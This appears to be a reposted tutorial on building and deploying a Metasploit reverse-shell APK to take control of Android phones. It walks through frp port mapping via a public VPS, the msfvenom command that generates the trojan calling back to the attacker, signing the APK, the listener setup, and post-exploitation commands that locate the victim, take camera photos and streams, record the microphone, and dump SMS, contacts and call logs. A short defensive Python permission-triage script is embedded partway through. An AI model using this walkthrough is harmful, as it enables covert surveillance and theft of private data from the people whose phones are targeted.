
How to remotely control Android devices through Metasploit

2025-02-24 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)06/01 Report--

Many people with little experience are at a loss when it comes to remotely controlling Android devices through Metasploit. This article therefore summarizes the causes of the problem and the solutions, so that after reading it you should be able to solve it yourself.

Metasploit module used in Android system

As shown in the following figure, several payloads are available for Android:

Port mapping scheme

If the victim's phone is on the same local area network as the attacker's computer, the phone can reach the attacker's computer directly and no port mapping is needed. In reality, however, the victim's phone is almost always on the public Internet or on a different internal network, while the attacker's computer sits inside an intranet, so the phone cannot reach it directly. Port mapping solves this: the attacker's port is mapped onto a VPS on the public Internet, and the phone reaches the attacker's intranet computer indirectly by connecting to that public VPS.

A simpler alternative: since you already have a VPS, why not use the VPS itself as the attack machine? Installing Metasploit directly on the VPS, generating the Trojan there and controlling the victim's phone from there is straightforward. This article nevertheless uses port mapping.

frp

We first use the frp tool for port mapping, so that the Kali attack machine on the internal network can reach the Android device on the external network.

Experimental environment:

Target Android device

Public network vps (centos)

Intranet attack machine (Kali)

The main idea:

The public VPS runs the frp server (frps)

The local Kali runs the frp client (frpc)

Kali's local port is mapped to the public VPS

1. VPS server:

Use the VPS as the frp server and run ./frps -c ./frps.ini. The server configuration frps.ini is as follows:

    [common]
    bind_port = 7000   # this is the default; change it or leave it

2. Client:

Use the intranet attack machine Kali as the frp client; the client configuration frpc.ini is as follows:

    [common]
    server_addr = 39.xxx.xxx.210   # public IP of the VPS
    server_port = 7000             # must match the server's bind_port

    [msf]
    type = tcp
    local_ip = 127.0.0.1
    local_port = 4444              # data arriving at the frp server is forwarded to local port 4444
    remote_port = 2333             # port opened on the server side

The client connects to the VPS's IP on listening port 7000, and data arriving at public port 2333 is forwarded to local port 4444.

Once configured, run ./frpc -c ./frpc.ini to start the client:

At this point, the frp is configured, and the next step is to generate Trojans.

Metasploit generates Trojan Horse

Use Metasploit to generate an APK containing a malicious Android payload. Open a new terminal in Kali Linux and enter:

    msfvenom -p android/meterpreter/reverse_tcp LHOST=39.xxx.xxx.210 LPORT=2333 R > shell.apk
    # LHOST: public IP of the VPS; LPORT: the public port (2333) mapped by frp

Sign the APK

We now have a payload in Android's APK format. However, Android devices generally refuse to install applications that are not signed with a certificate; only signed APKs are installed. We can sign the APK manually with the following tools:

keytool

jarsigner

zipalign

Of these three, the first two ship with Kali and the third must be installed (in newer Kali versions, jarsigner also has to be installed separately with apt-get install openjdk-13-jdk-headless).

Step 1: use keytool to generate a key file. It prompts for the name, organization, address and other details of the key and finally writes out a keystore file.

    keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

You can answer the prompts above however you like, but at the final confirmation type y rather than yes, otherwise the prompt keeps repeating.

As shown below, generate a key file:

Step 2: use the key file with JARsigner to sign the APK

    jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore shell.apk alias_name

Step 3: then use JARsigner to verify the signature

    jarsigner -verify -verbose -certs shell.apk

At this point, the signing process is complete, and the shell.apk can be used in Android.

Start the Metasploit listener

Use Metasploit to listen on the local port that receives the forwarded data:

    msfconsole
    use exploit/multi/handler
    set payload android/meterpreter/reverse_tcp
    set LHOST 127.0.0.1
    set LPORT 4444
    exploit

Then deliver the payload-bearing APK to the phone, install and launch it, and a session for the phone appears in msf:

Here, on some phones the session disconnects automatically after a while; I do not know why. The workaround I came up with is: as soon as I get the session, I immediately run webcam_stream to open the remote video and then close the video. After that the session is stable and no longer disconnects. I do not know why!

After obtaining Meterpreter access to the target Android phone, we can run the following commands for post-exploitation

Post-penetration attack

Check whether the phone is rooted

    check_root

Make the target phone send a text message

    send_sms -d <phone number> -t "hello"

View system information

    sysinfo

Locate the phone.

    wlan_geolocate   # use WLAN information to obtain the current geographic location
    geolocate        # use geolocation (GPS) to obtain the current latitude and longitude

This command outputs the phone's longitude and latitude, from which we can determine its location; it also prints a URL that shows the location on Google Maps. Since that site requires circumvention tools to reach from mainland China, we can instead look the coordinates up directly in Google Earth:

The accuracy needs no comment: it is precise to the building number. (The longitude and latitude above were obtained with geolocate.)

Call the cell phone camera

    webcam_list          # list webcams
    webcam_snap -i 1     # take a snapshot from camera 1 (or 2)
    webcam_chat          # start a video chat
    webcam_snap          # take a snapshot from the specified camera
    webcam_stream -i 1   # play the video stream from the specified webcam

Call the microphone

    record_mic -d X   # record X seconds of audio from the default microphone

Without -d, this command records one second of audio from the default microphone; it then attempts to play back the captured .wav file.

Get communication record information

    dump_calllog    # download the call history from the target phone
    dump_contacts   # get the contact list
    dump_sms        # get the SMS messages

As shown above, the call log, contact list and text messages are saved to files on the attacker's machine.

Here is a more entertaining one. Now I will remotely change the wallpaper of my own phone. Continue entering commands as follows:

    msf > use post/multi/manage/set_wallpaper
    msf post(set_wallpaper) > set WALLPAPER_FILE /root/5.jpg
    msf post(set_wallpaper) > set SESSION 1
    msf post(set_wallpaper) > exploit

5.jpg is as follows:

Run the module and the wallpaper is replaced successfully:
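From the defender's side, every post-exploitation command shown above only works if the installed APK declares the matching Android permission, so a decoded AndroidManifest.xml is a cheap triage signal. The following is an added example (not part of the original article or of Metasploit): the command-to-permission mapping is mine, derived from the commands listed on this page, the manifest is constructed, and a real APK's binary manifest would first need decoding with a tool such as apktool.

```python
"""Triage heuristic: map the Meterpreter Android commands discussed above to the
permissions an APK must declare to use them, then score a decoded manifest."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Each command on this page needs at least one of these permissions (my mapping).
CAPABILITY_PERMISSIONS = {
    "webcam_snap/webcam_stream": {"android.permission.CAMERA"},
    "record_mic":                {"android.permission.RECORD_AUDIO"},
    "dump_sms":                  {"android.permission.READ_SMS"},
    "send_sms":                  {"android.permission.SEND_SMS"},
    "dump_contacts":             {"android.permission.READ_CONTACTS"},
    "dump_calllog":              {"android.permission.READ_CALL_LOG"},
    "geolocate/wlan_geolocate":  {"android.permission.ACCESS_FINE_LOCATION",
                                  "android.permission.ACCESS_COARSE_LOCATION"},
    "set_wallpaper":             {"android.permission.SET_WALLPAPER"},
}

def declared_permissions(manifest_xml: str) -> set:
    """Return the android:name values of all <uses-permission> elements."""
    root = ET.fromstring(manifest_xml)
    return {el.get(f"{{{ANDROID_NS}}}name") for el in root.iter("uses-permission")}

def spyware_capabilities(manifest_xml: str) -> list:
    """List the commands from this page that the declared permissions would enable."""
    perms = declared_permissions(manifest_xml)
    return [cmd for cmd, needed in CAPABILITY_PERMISSIONS.items() if perms & needed]

def is_suspicious(manifest_xml: str, threshold: int = 5) -> bool:
    """Flag an APK whose permissions cover most of the capability set at once.
    A single-purpose app (camera, messaging) matches one or two; covering five
    or more of them is the profile of a remote-control implant."""
    return len(spyware_capabilities(manifest_xml)) >= threshold

# Constructed sample (not taken from a real APK): a decoded manifest declaring
# everything needed to run every command shown on this page.
SAMPLE_MANIFEST = f"""<manifest xmlns:android="{ANDROID_NS}" package="com.example.constructed">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.READ_CALL_LOG"/>
  <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
  <uses-permission android:name="android.permission.SET_WALLPAPER"/>
</manifest>"""

if __name__ == "__main__":
    print(spyware_capabilities(SAMPLE_MANIFEST), is_suspicious(SAMPLE_MANIFEST))
```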

More commands are as follows:

System commands:

    execute     # execute a command
    getuid      # get the currently running user
    localtime   # display the target system's local date and time
    pgrep       # filter processes by name
    ps          # list running processes

User interface commands:

    screenshare   # watch the remote user's screen in real time
    screenshot    # capture a screenshot of the interactive desktop

Audio output commands:

    play   # play a waveform audio file (.wav)

Application controller commands:

    app_install     # request installation of an apk file
    app_list        # list the names of installed applications
    app_run         # start the main activity of a package on the device
    app_uninstall   # request uninstallation of an apk file

After reading the above, do you know how to remotely control Android devices through Metasploit? If you want to learn more skills or find out more about the topic, you are welcome to follow the industry information channel. Thank you for reading!
